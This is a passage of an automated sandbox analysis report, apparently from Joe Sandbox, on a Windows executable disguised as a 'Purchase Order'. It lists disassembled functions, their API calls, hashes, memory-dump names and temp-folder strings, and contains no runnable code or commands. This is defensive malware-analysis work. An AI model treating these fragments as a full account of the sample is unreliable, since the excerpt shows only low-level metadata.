                                            • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                            Function 73CF18DD Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FreeGlobal
                                            • String ID:
                                            • API String ID: 2979337801-0
                                            • Opcode ID: 08fd3690e0e25fde2fcdbfb9045b8a6e9e2887ea4343067599bae2e4a863d54c
                                            • Instruction ID: 17dac50cf7e9aabfe97ad9bb7f333e7f79390bbd7c37b21238a89d742479ef5a
                                            • Opcode Fuzzy Hash: 08fd3690e0e25fde2fcdbfb9045b8a6e9e2887ea4343067599bae2e4a863d54c
                                            • Instruction Fuzzy Hash: 8251E573D0015BABDBC2DFA588807ADBBBAEF44310F16536AD402EB194D771AB818791
                                            Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDC.USER32(?), ref: 00401DBC
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                            • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            • Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                            • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                            • Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                            • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                            Function 73CF1621 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73CF21F0,?,00000808), ref: 73CF1639
                                            • GlobalAlloc.KERNEL32(?,00000000,?,00000000,73CF21F0,?,00000808), ref: 73CF1640
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73CF21F0,?,00000808), ref: 73CF1654
                                            • GetProcAddress.KERNEL32(73CF21F0,00000000), ref: 73CF165B
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF1664
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                            • String ID:
                                            • API String ID: 1148316912-0
                                            • Opcode ID: d5473c6c5cea10031908d83aa98d3e0c9551cec850e33d616247fec1f8aaef17
                                            • Instruction ID: 2f83909840a8ee94c002f9ae59e8c1638c926e24a01d89557187bfebbd403f63
                                            • Opcode Fuzzy Hash: d5473c6c5cea10031908d83aa98d3e0c9551cec850e33d616247fec1f8aaef17
                                            • Instruction Fuzzy Hash: A3F01C732061797BD62066A78C4CD9BBE9CDF8B2F5B220212F66C9219086628C01DBF1
                                            Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                            • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                            • Opcode Fuzzy Hash: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                            • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                            Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                            • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                            • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                            • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                            Function 00404ADE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                            • wsprintfW.USER32 ref: 00404B88
                                            • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                            • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                            • Opcode Fuzzy Hash: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                            • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                            Function 00405B8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040337C,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 00405B95
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040337C,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 00405B9F
                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,?,0000000A), ref: 00405BB1
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B8F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 2659869361-2382934351
                                            • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                            • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                            • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                            • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                            Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Close$Enum
                                            • String ID:
                                            • API String ID: 464197530-0
                                            • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                            • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                            • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                            • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                            Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                            Download Yara Rule
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,?,0000000A), ref: 00402E8C
                                            • GetTickCount.KERNEL32 ref: 00402EAA
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                            • ShowWindow.USER32(00000000,00000005,?,00000006,?,0000000A), ref: 00402ED5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                            • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                            • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                            • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                            Function 00403915 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B3420,004038ED,00403703,00000006,?,00000006,?,0000000A), ref: 0040392F
                                            • GlobalFree.KERNEL32(?), ref: 00403936
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403927
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 1100898210-2382934351
                                            • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                            • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                            • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                            • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                            Function 00405BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405BE1
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405BF1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-3976562730
                                            • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                            • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                            • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                            • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                            Function 73CF10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalAlloc.KERNEL32(?,?), ref: 73CF116A
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF11C7
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF11D9
                                            • GlobalFree.KERNEL32(?), ref: 73CF1203
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: 369094fd6eac7c9b2c4ab54623578fba49438e06a3554d0578df81dd65481c8a
                                            • Instruction ID: 1391a45ee23b6083de4b5b881d00dbe0b7a0ef33891477dd5c6ec7e5a3690bff
                                            • Opcode Fuzzy Hash: 369094fd6eac7c9b2c4ab54623578fba49438e06a3554d0578df81dd65481c8a
                                            • Instruction Fuzzy Hash: C331C4B3500213AFE740FFA6D944F257BF8EB44310715811AE84ADB254E736DD40C721
                                            Function 00405D15 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                            • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                            • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                            • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                            • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98

                                            Execution Graph

                                            Execution Coverage:0%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:100%
                                            Total number of Nodes:1
                                            Total number of Limit Nodes:0
                                            execution_graph 70195 34862b60 LdrInitializeThunk

                                            Executed Functions

                                            Function 348635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3 348635c0-348635cc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
